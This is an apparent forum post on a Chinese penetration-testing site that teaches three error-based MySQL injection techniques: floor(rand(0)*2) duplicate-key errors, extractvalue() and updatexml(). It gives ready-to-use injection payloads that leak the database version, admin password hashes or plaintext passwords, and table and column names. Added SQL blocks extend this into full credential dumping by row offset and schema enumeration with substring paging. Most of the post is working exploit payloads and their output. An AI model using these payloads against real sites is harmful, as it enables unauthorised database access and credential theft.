中国网络渗透测试联盟
Title: Three error-based techniques used in MySQL injection
Author: admin
Time: 2012-12-10 10:28
Posting some of my old notes. When MySQL executes a statement it throws an error message, and PHP+MySQL sites very often print that error text straight onto the page, so the three constructions below can be used to pull specific data out through the error. The precondition is that the application really does echo the MySQL error (for example the output of mysql_error()); if errors are suppressed, none of these techniques produces visible output.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Errors via floor()

Either of the following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Why it works: GROUP BY stores each distinct key in a temporary table, and the key expression is evaluated once to look the group up and evaluated again when a new group is inserted. rand(0) is seeded, so floor(rand(0)*2) produces the fixed sequence 0,1,1,0,1,1,...: the first row misses on "...0" and inserts "...1", the second row finds "...1", and the third row misses on "...0" and then tries to insert "...1" a second time, which raises the duplicate-key error. The row source therefore needs at least three rows, which is why information_schema.tables or a three-row union is used.

Example:

First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate entry (the trailing 1 is the floor(rand(0)*2) value, not part of the data). To retrieve other data, replace the version() call with a subquery for the value wanted.

For example, to read the administrator's user name and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

In both cases the password is admin888; again the final 1 comes from floor(rand(0)*2).
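As an added example that is not part of the original post, the following MySQL session makes the floor() technique reproducible and generalizes it: it recreates the post's test.admin table with constructed rows (admin888 is the password shown in the post, the second row is invented), shows the deterministic rand(0) sequence, then walks rows by offset and enumerates the schema through information_schema with the same template. It assumes a MySQL 5.0 or later server that reproduces the 5.1 behaviour in the post and a session allowed to create the test database.

```sql
-- Added example, not from the original post. Recreates the post's test.admin
-- table with constructed rows, then walks the floor(rand(0)*2) technique.
CREATE DATABASE IF NOT EXISTS test;
USE test;
DROP TABLE IF EXISTS admin;
CREATE TABLE admin (
  id   int unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, -- describe shows int(10) unsigned
  user varchar(50) NOT NULL,
  pass varchar(50) NOT NULL
);
-- Constructed sample data: 'admin888' is the value leaked in the post, the
-- second row is invented so that offset paging has something to find.
INSERT INTO admin (user, pass) VALUES ('admin', 'admin888'), ('editor', 'pa55w0rd');

-- Why rand(0): it is seeded, so floor(rand(0)*2) yields the same 0,1,1,0,1,1,...
-- on every run. GROUP BY re-evaluates the key when it inserts a new group, so
-- the third row tries to insert a key the first row already stored and MySQL
-- raises ERROR 1062. The row source therefore needs at least three rows;
-- information_schema.tables always has plenty.
SELECT floor(rand(0)*2) AS r FROM information_schema.tables LIMIT 6;

-- Generic template: put the value to leak in the inner subquery. 0x3a is ':',
-- used to join several columns into one key. LIMIT n,1 selects row n+1.
SELECT 1 FROM (
  SELECT count(*), concat((SELECT concat(user, 0x3a, pass) FROM admin LIMIT 0,1),
                          floor(rand(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) AS a;

-- Next row: raise the offset. Once the offset runs past the last row the
-- subquery is NULL, concat() is NULL, and no error is raised; that is the
-- signal to stop.
SELECT 1 FROM (
  SELECT count(*), concat((SELECT concat(user, 0x3a, pass) FROM admin LIMIT 1,1),
                          floor(rand(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) AS a;

-- Schema discovery with the same template: current database, its tables, then
-- the columns of one table. group_concat() folds a list into one message
-- (bounded by group_concat_max_len, 1024 bytes by default).
SELECT 1 FROM (
  SELECT count(*), concat(database(), floor(rand(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) AS a;

SELECT 1 FROM (
  SELECT count(*), concat((SELECT group_concat(table_name)
                             FROM information_schema.tables
                            WHERE table_schema = database()),
                          floor(rand(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) AS a;

SELECT 1 FROM (
  SELECT count(*), concat((SELECT group_concat(column_name)
                             FROM information_schema.columns
                            WHERE table_schema = database() AND table_name = 'admin'),
                          floor(rand(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) AS a;

-- Without information_schema (MySQL before 5.0, or no access to it): any
-- derived table with at least three rows serves as the row source, as in the
-- post's "select 1 union select null union select !1" variant.
SELECT count(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) AS t
GROUP BY concat((SELECT pass FROM admin LIMIT 0,1), floor(rand(0)*2));
```

Run it statement by statement in the mysql client: the first template statement fails with a duplicate entry of admin:admin8881, the second with editor:pa55w0rd1, and the schema statements leak test, admin and id,user,pass respectively, each followed by the trailing 1 from floor(rand(0)*2). Long values can be cut in the duplicate-entry message, so for anything lengthy switch to substring() paging as with the XPath functions.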
2. extractvalue()

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c, (select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

0x5c is a backslash, which is not valid XPath, so the parser stops there and reports the rest of the string verbatim. extractvalue() exists since MySQL 5.1.5, and the XPath error message is cut at 32 characters, so longer values have to be read in pieces with substring().
3. updatexml()

Test payload:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

0x5e24 is the two characters ^$, used here purely as delimiters so the leaked value is easy to spot in the message. updatexml() is available from the same release as extractvalue() (MySQL 5.1.5) and is subject to the same 32-character limit on the error text.
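Added here as an example that is not in the original post, and covering both the extractvalue() section above and this updatexml() section: the XPath error echoes the offending expression, but only its first 32 characters, so long values are read in pieces with substring(). The statements use only built-in functions and information_schema, so no test tables are needed; the assumption is a MySQL 5.1.5 or later server, the first release with both functions.

```sql
-- Added example, not from the original post. Applies to both extractvalue()
-- and updatexml(): the XPath error echoes the offending expression, but the
-- message is cut at 32 characters, so long values are read in pieces.
-- Uses only built-ins and information_schema; assumes MySQL >= 5.1.5.

-- 0x7e is '~', invalid at the start of an XPath expression, so the parser
-- stops immediately and reports everything after it. 0x5c ('\') as in the
-- post does the same job.
SELECT extractvalue(1, concat(0x7e, version()));
SELECT updatexml(1, concat(0x7e, user(), 0x7e), 1);

-- A long value: the comma-joined table list of the mysql schema is well over
-- 32 characters, so the error shows only its beginning. group_concat() is
-- itself bounded by group_concat_max_len (1024 bytes by default).
SELECT extractvalue(1, concat(0x7e,
  (SELECT group_concat(table_name) FROM information_schema.tables
    WHERE table_schema = 'mysql')));

-- Learn the total length first, so the number of pages is known in advance.
SELECT extractvalue(1, concat(0x7e,
  (SELECT length(group_concat(table_name)) FROM information_schema.tables
    WHERE table_schema = 'mysql')));

-- Then page 31 characters at a time, one character of the 32 being spent on
-- the '~' marker: substring(v, 1, 31), substring(v, 32, 31), substring(v, 63, 31), ...
SELECT extractvalue(1, concat(0x7e, substring(
  (SELECT group_concat(table_name) FROM information_schema.tables
    WHERE table_schema = 'mysql'), 1, 31)));
SELECT extractvalue(1, concat(0x7e, substring(
  (SELECT group_concat(table_name) FROM information_schema.tables
    WHERE table_schema = 'mysql'), 32, 31)));

-- The same paging with updatexml(). The post's trailing delimiter is dropped
-- here because it would consume one of the 32 characters; the length query
-- above already tells you where the value ends.
SELECT updatexml(1, concat(0x7e, substring(
  (SELECT group_concat(table_name) FROM information_schema.tables
    WHERE table_schema = 'mysql'), 1, 31)), 1);
```

Each SELECT fails with ERROR 1105 and an XPATH syntax error whose quoted text begins with ~ followed by the page; when a page comes back shorter than 31 characters, or the offset reaches the length reported earlier, the value is complete.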
That's all. Thanks to the foreign guys.
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2